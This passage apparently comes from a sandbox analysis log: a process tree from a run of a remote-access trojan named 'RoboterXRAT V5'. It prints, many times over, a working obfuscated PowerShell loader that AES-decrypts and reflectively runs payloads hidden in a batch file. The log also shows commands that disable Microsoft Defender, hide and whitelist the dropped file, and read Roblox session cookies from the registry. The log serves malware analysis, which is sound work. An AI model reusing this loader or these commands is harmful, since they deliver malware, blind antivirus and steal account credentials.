        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        27⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5232
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:2788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        25⤵
        
        PID:1656
        
        C:\Windows\system32\net.exe
        
        net file
        26⤵
        
        PID:5492
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        27⤵
        
        PID:124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        26⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2040
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:1624
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        24⤵
        
        PID:4712
        
        C:\Windows\system32\net.exe
        
        net file
        25⤵
        
        PID:3916
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        26⤵
        
        PID:3620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        25⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2316
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:5176
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:4192
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        23⤵
        
        PID:5440
        
        C:\Windows\system32\net.exe
        
        net file
        24⤵
        
        PID:5080
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        25⤵
        
        PID:6004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        24⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5856
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:4396
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        22⤵
        
        PID:5380
        
        C:\Windows\system32\net.exe
        
        net file
        23⤵
        
        PID:1420
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        24⤵
        
        PID:5844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5904
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        23⤵
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        24⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        25⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        26⤵
        
        PID:1220
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        27⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        28⤵
        
        PID:5112
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        29⤵
        
        PID:2824
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        29⤵
        
        PID:6080
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        
        PID:5640
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        28⤵
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        28⤵
        
        PID:2768
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:2272
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        29⤵
        Views/modifies file attributes
        
        PID:5952
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        29⤵
        
        PID:4812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        29⤵
        
        PID:2588
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        29⤵
        
        PID:6700
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        29⤵
        
        PID:7124
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        29⤵
        
        PID:6712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5040
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        29⤵
        Detects videocard installed
        
        PID:6556
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        29⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4632
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        30⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2208
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        27⤵
        
        PID:2780
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        27⤵
        
        PID:3896
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        26⤵
        
        PID:3392
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        26⤵
        
        PID:4632
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        25⤵
        
        PID:4528
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        25⤵
        
        PID:1912
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        24⤵
        
        PID:5476
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        24⤵
        
        PID:5772
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        23⤵
        
        PID:3580
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        
        PID:2184
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        21⤵
        
        PID:5300
        
        C:\Windows\system32\net.exe
        
        net file
        22⤵
        
        PID:2444
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        23⤵
        
        PID:1084
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        22⤵
        
        PID:5736
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        21⤵
        
        PID:3056
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        22⤵
        
        PID:1492
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        22⤵
        
        PID:1460
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        22⤵
        
        PID:4920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:4924
        
        C:\Windows\SYSTEM32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        23⤵
        Views/modifies file attributes
        
        PID:4072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\sihost.exe'
        23⤵
        
        PID:2000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1968
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        23⤵
        
        PID:4648
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        23⤵
        
        PID:5396
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        23⤵
        
        PID:3132
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        23⤵
        
        PID:5592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4188
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        23⤵
        Detects videocard installed
        
        PID:2000
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\sihost.exe" && pause
        23⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2424
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        24⤵
        
        PID:4880
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        24⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:428
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        20⤵
        
        PID:5552
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        21⤵
        
        PID:4164
        
        C:\Windows\system32\net.exe
        
        net file
        21⤵
        
        PID:5528
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        22⤵
        
        PID:2008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3376
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        20⤵
        
        PID:5364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        19⤵
        
        PID:3268
        
        C:\Windows\system32\net.exe
        
        net file
        20⤵
        
        PID:484
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
